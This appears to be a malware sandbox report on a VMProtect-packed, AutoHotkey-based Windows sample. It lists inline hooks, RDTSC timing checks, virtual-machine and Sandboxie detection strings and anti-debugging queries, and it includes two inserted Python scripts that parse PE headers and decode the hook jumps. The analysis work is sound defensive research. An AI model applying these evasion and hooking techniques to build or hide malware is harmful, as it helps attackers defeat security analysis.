Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static file information: File size 5805568 > 1048576
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x583e00
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: section name: .vmp0
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: section name: .vmp1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004C854D push ecx; ret 0_2_004C8560
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004C6E90 push ecx; ret 0_2_004C6EA3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0048D255 push ecx; ret 0_2_0048D268
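The static checks above (entry point in a non-standard section, `.vmp0`/`.vmp1` section names, a raw section larger than 0x100000 bytes) can be reproduced with a header-only PE parser. The following is an added example, not part of this report or of the sandbox's own code; the "standard" section-name set and the constructed sample header (modelled on the sizes the report shows) are assumptions made for the example.

```python
import struct

# Section names treated as the "standard" home of the entry point.
# Assumption: the report does not define the set; this is a common analyst choice.
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}
VMPROTECT_PREFIX = ".vmp"          # .vmp0 / .vmp1 as seen in this report
RAW_SIZE_THRESHOLD = 0x100000      # the report flags raw section sizes above this


def build_sample_pe(sections, entry_rva):
    """Construct a minimal PE32 header (headers only, no code) for offline testing.

    sections: list of (name, virtual_address, virtual_size, raw_size, raw_pointer)
    """
    e_lfanew = 0x40
    opt_size = 224                                   # PE32 optional header incl. 16 data directories
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)              # e_lfanew lives at 0x3C
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva)     # AddressOfEntryPoint at +16
    opt += b"\0" * (opt_size - len(opt))
    hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, raw, ptr, 0, 0, 0, 0, 0x60000020)
        for name, va, vsize, raw, ptr in sections
    )
    return dos + coff + opt + hdrs


def parse_pe(data):
    """Return (entry_rva, sections) read from a PE image's headers (PE32 or PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    entry_rva = struct.unpack_from("<I", data, e_lfanew + 24 + 16)[0]   # same offset in PE32/PE32+
    off = e_lfanew + 24 + opt_size                                       # first IMAGE_SECTION_HEADER
    sections = []
    for _ in range(num_sections):
        name, vsize, va, raw, ptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_size": raw, "raw_ptr": ptr})
        off += 40
    return entry_rva, sections


def triage(data, raw_size_threshold=RAW_SIZE_THRESHOLD):
    """Apply the three static checks from the report and return the findings."""
    entry_rva, sections = parse_pe(data)
    entry_section = None
    for s in sections:
        span = max(s["vsize"], s["raw_size"])
        if s["va"] <= entry_rva < s["va"] + span:
            entry_section = s["name"]
            break
    return {
        "entry_rva": entry_rva,
        "entry_section": entry_section,
        "entry_outside_standard": entry_section not in STANDARD_CODE_SECTIONS,
        "vmprotect_sections": [s["name"] for s in sections if s["name"].startswith(VMPROTECT_PREFIX)],
        "oversized_sections": [(s["name"], s["raw_size"]) for s in sections
                               if s["raw_size"] > raw_size_threshold],
    }


# Constructed sample: layout modelled on this report (.vmp1 raw size 0x583e00, entry inside .vmp1).
SAMPLE_PE = build_sample_pe(
    [(".text", 0x1000, 0x100000, 0x100000, 0x400),
     (".vmp0", 0x101000, 0x200000, 0x0, 0x0),
     (".vmp1", 0x301000, 0x583E00, 0x583E00, 0x100400)],
    entry_rva=0x400000,
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_PE).items():
        print(f"{key}: {value}")
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes to `triage`; the parser only touches the headers, so a packed 5 MB sample costs nothing extra. Note that an entry point outside `.text` is a packer indicator, not proof of malice on its own.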

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1210005 value: E9 2B BA CB 75 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 76ECBA30 value: E9 DA 45 34 8A Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1230008 value: E9 8B 8E CE 75 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 76F18E90 value: E9 80 71 31 8A Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1250005 value: E9 8B 4D 9A 74 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 75BF4D90 value: E9 7A B2 65 8B Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1260005 value: E9 EB EB 9A 74 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 75C0EBF0 value: E9 1A 14 65 8B Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1270005 value: E9 8B 8A D6 73 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 74FD8A90 value: E9 7A 75 29 8C Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 1280005 value: E9 2B 02 D8 73 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 75000230 value: E9 DA FD 27 8C Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 12A0005 value: E9 8B 2F C6 75 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 76F02F90 value: E9 7A D0 39 8A Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 12B0007 value: E9 EB DF C8 75 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Memory written: PID: 6916 base: 76F3DFF0 value: E9 1E 20 37 8A Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
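Every "Memory written" entry above is a 5-byte `E9 rel32` near jump, and they come in pairs: one planted at a high address and one in a low private page. Decoding the displacement (relative to the end of the 5-byte instruction) shows the classic inline-hook layout: the jump at the high address detours into the private page, and the jump in the private page resumes at the hooked address plus the number of original bytes it displaced (5, 7 or 8 here). The script below is an added example, not part of this report; it uses the report's own bytes as input. The report does not name the patched modules, so the assumption that the hooked functions sit above the sample's private pages (as 32-bit system DLLs normally do) is the example's own.

```python
import re
import struct

# Constructed input: the "Memory written" lines of this report (PID 6916), copied verbatim.
MEMORY_WRITES = """
Memory written: PID: 6916 base: 1210005 value: E9 2B BA CB 75
Memory written: PID: 6916 base: 76ECBA30 value: E9 DA 45 34 8A
Memory written: PID: 6916 base: 1230008 value: E9 8B 8E CE 75
Memory written: PID: 6916 base: 76F18E90 value: E9 80 71 31 8A
Memory written: PID: 6916 base: 1250005 value: E9 8B 4D 9A 74
Memory written: PID: 6916 base: 75BF4D90 value: E9 7A B2 65 8B
Memory written: PID: 6916 base: 1260005 value: E9 EB EB 9A 74
Memory written: PID: 6916 base: 75C0EBF0 value: E9 1A 14 65 8B
Memory written: PID: 6916 base: 1270005 value: E9 8B 8A D6 73
Memory written: PID: 6916 base: 74FD8A90 value: E9 7A 75 29 8C
Memory written: PID: 6916 base: 1280005 value: E9 2B 02 D8 73
Memory written: PID: 6916 base: 75000230 value: E9 DA FD 27 8C
Memory written: PID: 6916 base: 12A0005 value: E9 8B 2F C6 75
Memory written: PID: 6916 base: 76F02F90 value: E9 7A D0 39 8A
Memory written: PID: 6916 base: 12B0007 value: E9 EB DF C8 75
Memory written: PID: 6916 base: 76F3DFF0 value: E9 1E 20 37 8A
"""

# Whitespace inside the byte list is limited to spaces/tabs so the match stops at the line end.
LINE_RE = re.compile(r"base:\s*([0-9A-Fa-f]+)\s+value:\s*((?:[0-9A-Fa-f]{2}[ \t]*)+)")


def decode_jmp(base, code):
    """Decode a 5-byte E9 rel32 near jmp written at `base`; return its 32-bit target, or None."""
    if len(code) < 5 or code[0] != 0xE9:
        return None
    rel32 = struct.unpack("<i", code[1:5])[0]            # signed displacement
    return (base + 5 + rel32) & 0xFFFFFFFF                # relative to the next instruction


def parse_writes(text):
    """Extract (base, bytes) tuples from lines of the form 'base: <hex> value: <hex bytes>'."""
    return [(int(m.group(1), 16), bytes.fromhex("".join(m.group(2).split())))
            for m in LINE_RE.finditer(text)]


def pair_hooks(writes, max_displaced=15):
    """Match each inline hook with its trampoline.

    Assumption (not stated in the report): the patched functions are mapped above the sample's
    private pages, so a jmp whose target lies below its own address is the hook and a jmp whose
    target lies above is the trampoline. The trampoline resumes at hooked + n, where n (>= 5) is
    the number of original bytes displaced by the 5-byte jmp.
    """
    targets = {base: decode_jmp(base, code) for base, code in writes}
    hooks = {b: t for b, t in targets.items() if t is not None and t < b}
    stubs = {b: t for b, t in targets.items() if t is not None and t > b}
    pairs = []
    for hooked, detour in hooks.items():
        back = [(b, t) for b, t in stubs.items() if hooked + 5 <= t <= hooked + max_displaced]
        stub, resume = back[0] if back else (None, None)
        pairs.append({"hooked": hooked, "detour": detour, "trampoline": stub,
                      "displaced": resume - hooked if stub is not None else None})
    return sorted(pairs, key=lambda p: p["hooked"])


if __name__ == "__main__":
    for p in pair_hooks(parse_writes(MEMORY_WRITES)):
        print(f"hooked {p['hooked']:08X} -> detour {p['detour']:08X}; "
              f"trampoline {p['trampoline']:08X} resumes at +{p['displaced']}")
```

With the sample's process still alive, the same pairing can be confirmed in a debugger by reading the first bytes at each high address: they should start with `E9` and disassemble to a jump into the 0x121xxxx region, and the bytes that used to be there should be found just before the trampoline's own `E9`. Which functions were patched has to be resolved from the loaded-module list of that session; the report does not record it.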

Malware Analysis System Evasion

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: SBIEDLL.DLL
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Binary or memory string: 2SBIEDLL.DLL
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe RDTSC instruction interceptor: First address: 93D49E second address: 8CBA1C instructions: 0x00000000 rdtsc 0x00000002 shl ch, 0000002Bh 0x00000005 adc ecx, 7E935657h 0x0000000b sub ecx, eax 0x0000000d sub ebp, 00000008h 0x00000013 mov dword ptr [ebp+00h], edx 0x00000017 mov dword ptr [ebp+04h], eax 0x0000001a lea edi, dword ptr [edi-00000004h] 0x00000020 rcl ch, FFFFFF8Eh 0x00000023 sar ch, FFFFFF97h 0x00000026 mov ecx, dword ptr [edi] 0x00000028 stc 0x00000029 jmp 00007F4244B787D5h 0x0000002e xor ecx, ebx 0x00000030 sub ecx, 19337904h 0x00000036 cmc 0x00000037 rol ecx, 02h 0x0000003a clc 0x0000003b xor ecx, 3E167F9Fh 0x00000041 cmp esp, 354D524Dh 0x00000047 jmp 00007F4244D04C72h 0x0000004c not ecx 0x0000004e cmc 0x0000004f test eax, edi 0x00000051 xor ebx, ecx 0x00000053 add esi, ecx 0x00000055 jmp 00007F424507F8A9h 0x0000005a jmp 00007F42448FA6D3h 0x0000005f lea edx, dword ptr [esp+60h] 0x00000063 cmp bp, di 0x00000066 stc 0x00000067 cmp ebp, edx 0x00000069 ja 00007F42450080C9h 0x0000006f push esi 0x00000070 ret 0x00000071 mov ecx, dword ptr [ebp+00h] 0x00000075 rol al, cl 0x00000077 cbw 0x00000079 add ebp, 00000004h 0x0000007f sub eax, 766F1A91h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Special instruction interceptor: First address: 824AAC instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Special instruction interceptor: First address: CE63D6 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004757E0 __fassign,FindFirstFileA,FindClose,FindFirstFileA, 0_2_004757E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0070D95B FindFirstFileA, 0_2_0070D95B
Source: Amcache.hve.0.dr Binary or memory string: VMware
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.0.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.000000000140F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.000000000140F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr Binary or memory string: vmci.sys
Source: Amcache.hve.0.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.0.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr Binary or memory string: VMware20,1
Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe System information queried: KernelDebuggerInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00430B40 _memset,_sprintf,CreateProcessA,CloseHandle,CloseHandle,_memset,SetCurrentDirectoryA,ShellExecuteEx,FormatMessageA, 0_2_00430B40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004124A0 keybd_event, 0_2_004124A0
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: Shell_TrayWnd
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: @TextLEFTLRIGHTRMIDDLEMX1X2WUWDWLWR{Blind}{ClickLl{}^+!#{}RawTempASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XSCALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uStdOutAllUnreachableClassOverwriteUseEnvLocalSameAsGlobalUseUnsetGlobalUseUnsetLocalYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleMouseTimeIdleKeyboardTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopFileSizeKBLoopFileSizeLoopFileShortPathLoopFileShortNameLoopFilePathLoopFileNameLoopFileLongPathLoopFileFullPathLoopFileExtLoopFileDirLoopFileAttribLoopFieldLineNumberLineFileLastErrorLanguageKeyDurationPlayKeyDurationKeyDelayPlayKeyDelayIsUnicodeIsSuspendedIsPausedIsCriticalIsCompiledIsAdminIs64bitOSIPAddress4IPAddress3IPAddress2IPAddress1InitialWorkingDirIndexIconTipIconNumberIconHiddenIconFileHourGuiYGuiXGuiWidthGuiHeightGuiEventGuiControlEventFormatIntegerFormatFloatExitReasonEventInfoEndCharDesktopCommonDesktopDefaultTreeViewDefaultMouseSpeedDefaultListViewDefaultGuiDDDDDDDDDCursorCoordModeToolTipCoordModePixelCoordModeMouseCoordModeMenuCoordModeCaretControlDelayComputerNameCaretYCaretXBatchLinesAppDataCommonAppDataAhkVersionAhkPathTrueProgramFilesFalseComSpecClipboardAll...%s[%Iu of 
%Iu]: %-1.60s%sPropertyRegExMatch\:\:REG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefUnicodeHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersLabelTypeCountLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPFuncRemoveClipboardFormatListeneruser32AddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMeRegClassAutoHotkey2Shell_TrayWndCreateWindoweditConsolasLucida Console*ErrorLevel <>=/|^,:*&~!()[]{}+-?."'\;`IFWHILEClass>AUTOHOTKEY SCRIPT<Could not extract script from EXE./*#CommentFlag*/and<>=/|^,:<>=/|^,:.+-*&!?~::?*- Continuation section too long.JoinLTrimRTrimMissing ")"Functions cannot contain functions.Missing "{"Not a valid method, class or property definition.GetSetNot a valid property getter/setter.Hotkeys/hotstrings are not allowed inside functions.IfWin should be #IfWin.+%s%s%sThis hotstring
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: Progman
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Amcache.hve.0.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: MsMpEng.exe
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: WIN_XP
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle\AutoHotkey.exeWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003WIN_2000%04hX0x%Ix*pPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCcFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameApsapi
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: WIN_VISTA
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: WIN_7
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: WIN_8
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: WIN_8.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00416C60 DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DeleteObject,DestroyCursor,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,DeleteObject,RemoveClipboardFormatListener, 0_2_00416C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00416E04 DeleteObject,RemoveClipboardFormatListener, 0_2_00416E04
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0041757E RemoveClipboardFormatListener, 0_2_0041757E
